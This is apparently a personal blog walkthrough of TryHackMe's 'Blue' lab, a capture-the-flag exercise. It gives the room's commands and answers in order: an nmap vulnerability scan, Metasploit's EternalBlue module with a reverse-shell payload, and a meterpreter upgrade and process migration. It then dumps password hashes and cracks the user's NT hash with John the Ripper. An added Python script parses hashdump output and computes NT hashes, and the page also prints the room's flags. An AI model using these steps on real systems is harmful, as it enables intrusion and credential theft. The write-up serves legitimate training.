Hi! It is time to look at the Blue CTF on TryHackMe. I am making these walkthroughs to keep myself motivated to learn cyber security, and to ensure that I remember the knowledge gained in THM's rooms. Join me in learning cyber security. I will try to explain concepts as I go, to differentiate myself from other walkthroughs.
Room URL: https://tryhackme.com/room/blue
Task 1 (Recon)
Let’s get started with some recon!
Questions
Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)
Let’s get started with some port scanning with nmap.
nmap -sV -sC --script vuln 10.10.184.191
The -sV flag adds version detection, the -sC flag runs the default scripts, while --script vuln runs Nmap's vulnerability-detection scripts against the open ports.
There is a lot to look at! We can see a variety of services running: RPC, NetBIOS, SMB and remote access. In addition we can see a vulnerability: smb-vuln-ms17-010, with CVE number CVE-2017-0143.
Answer: No answer needed
How many ports are open with a port number under 1000?
Answer: 3
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
Answer: ms17-010
Task 2 (Gain Access)
Exploit the machine and gain a foothold.
Questions
Start Metasploit
Answer: No answer needed
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
Well, we know the name of the vulnerability, and we want to search for modules of type exploit. So we can enter the following command:
search ms17-010 type:exploit
Considering the name of this room, I will go with the EternalBlue one.
Answer: exploit/windows/smb/ms17_010_eternalblue
Show options and set the one required value. What is the name of this value? (All caps for submission)
This is very often RHOSTS, but let’s have a look. Load the module by entering use 0. Then enter show options.
And yes, RHOSTS, which is the target host IP.
Answer: RHOSTS
Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:
set payload windows/x64/shell/reverse_tcp
Set the payload (see above), and the RHOSTS option to the target machine IP.
With that done, run the exploit!
Simply type run or exploit.
Answer: No answer needed
Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
We got access:
Background the shell by pressing Control+Z and move on to task 3.
Answer: No answer needed
Task 3 (Escalate)
Escalate privileges, learn how to upgrade shells in metasploit.
Questions
If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
I did a simple search for shell and found the following module:
Answer: post/multi/manage/shell_to_meterpreter
Select this (use MODULE_PATH). Show options, what option are we required to change?
Activate the module, and show options.
The answer is SESSION.
Answer: SESSION
Set the required option, you may need to list all of the sessions to find your target here.
In the above screenshot I used sessions -l to see the id of the shell session. Proceed by setting the SESSION to 1 (set SESSION 1).
Answer: No answer needed
Run! If this doesn’t work, try completing the exploit from the previous task once more.
Run the run command.
Enter the sessions -l command once more to see that we have an active Meterpreter session:
It is running with ID 2.
Answer: No answer needed
Once the meterpreter shell conversion completes, select that session for use.
Change sessions by writing sessions -i 2.
Answer: No answer needed
Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
Let’s run a shell and run whoami. We are indeed system.
Now background the shell, and select the meterpreter session once more.
Answer: No answer needed
List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
Run the ps command.
Pick a system process. I will remember ID 2728.
Answer: No answer needed
Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.
Simply enter migrate 2728 (or another ID you picked).
Migration completed!
Answer: No answer needed
Task 4 (Cracking)
Dump the non-default user’s password and crack it!
Questions
Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Now that we have our elevated shell, run hashdump.
In case you are wondering, each line of the hashdump output has the following colon-separated fields:
- Username (Administrator, Guest, Jon, etc.)
- Relative Identifier (RID): the last part of the account's SID; 500 and 501 are always Administrator and Guest
- LM hash (the legacy format; the fixed value aad3b435b51404eeaad3b435b51404ee means no LM hash is stored)
- NT hash (often called the NTLM hash)
The non-default user is Jon.
Answer: Jon
Copy this password hash to a file and research how to crack it. What is the cracked password?
Copy the hash (ffb43f0de35be4d9917ac0cc8ad57f8d) to a file by running:
echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > hash.txt
Let's use John the Ripper to crack it. I first thought the format would be LM, but the hash we copied is the NT hash, so the format is nt.
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
This gives us the answer.
Answer: alqfna22
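The hashdump fields listed above and the reason john's format is nt rather than LM, as an added example that is not part of the original walkthrough: a small Python script that parses hashdump lines into those four fields, reports what a defender reviews in such a dump (non-default accounts, empty passwords, legacy LM hashes), and recomputes an NT hash (MD4 over the UTF-16LE password) so a candidate from a password audit can be checked offline. The sample dump is constructed: Jon's NT hash is the one from the walkthrough; Jon's RID and the Administrator hash are made up.

```python
import re
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # well-known LM hash when no LM password is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # well-known NT hash of an empty password

def _rotl(x, n):
    return (((x & 0xFFFFFFFF) << n) | ((x & 0xFFFFFFFF) >> (32 - n))) & 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    # Minimal RFC 1320 MD4; hashlib's md4 is usually disabled under OpenSSL 3
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    rounds = [  # (message-word order, shifts, additive constant, boolean function)
        (list(range(16)), (3, 7, 11, 19), 0, lambda x, y, z: (x & y) | (~x & z)),
        ([(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13), 0x5A827999, lambda x, y, z: (x & y) | (z & (x | y))),
        ([0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1, lambda x, y, z: x ^ y ^ z),
    ]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for order, shifts, k, f in rounds:
            for i, w in enumerate(order):
                a = _rotl(a + f(b, c, d) + X[w] + k, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers so the next step updates the old d
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> str:
    # NT hash = MD4 over the UTF-16LE password; that is why john needs --format=nt, not LM
    return md4(password.encode("utf-16-le")).hex()

def parse_hashdump(text: str):
    # Each hashdump line is user:rid:lmhash:nthash::: (each hash is 32 hex chars)
    pat = re.compile(r"([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::")
    return [{"user": m[1], "rid": int(m[2]), "lm": m[3].lower(), "nt": m[4].lower()}
            for m in (pat.fullmatch(l.strip()) for l in text.splitlines()) if m]

def audit(entries):
    # Findings a defender wants from a dump; RIDs 500/501 are always Administrator/Guest
    checks = [(lambda e: e["rid"] not in (500, 501), "non-default account"),
              (lambda e: e["nt"] == EMPTY_NT, "empty password"),
              (lambda e: e["lm"] != EMPTY_LM, "LM hash stored (legacy, weak)")]
    return [f"{e['user']}: {msg}" for e in entries for test, msg in checks if test(e)]

# Constructed sample: Jon's NT hash is the one from the walkthrough; Jon's RID and the Administrator hash are made up
SAMPLE = """Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::"""
```

Comparing nt_hash("alqfna22") with the nt field of Jon's parsed line is exactly the check john performs for every wordlist entry before it reports the crack above.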
Task 5 (Find flags!)
Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!
Completed Blue? Check out Ice: Link
You can check out the third box in this series, Blaster, here: Link
Questions
Flag1? This flag can be found at the system root.
Make sure you are still in the meterpreter session. Check your present working directory by entering pwd, then move up (cd ..) twice. List the files in the current directory (ls or dir) and finally read the flag by running cat flag1.txt.
Answer: flag{access_the_machine}
Flag2? This flag can be found at the location where passwords are stored within Windows.
Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare; however, it can happen.
Windows passwords are stored as hashes in the SAM database, which lives in the C:\Windows\System32\config directory. Change your directory to there in the meterpreter shell:
cd C:/Windows/System32/config
List the files there and read flag2.txt:
Answer: flag{sam_database_elevated_access}
flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
I first thought I had to look in the C:/Users/Administrator folder, but it does not exist. Jon is an administrator, though, so let's look there instead.
If we list all the files in Jon's directory we do not see any flag. Let's go into the Documents folder. And bingo!
Answer: flag{admin_documents_can_be_valuable}
We are done! This was fun, and if you followed along with the Metasploit rooms on TryHackMe (I have walkthroughs for those as well!) it shouldn't have been too difficult 🙂 If you got some benefit from this walkthrough you are welcome to give me some claps.
Like my articles?
You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link: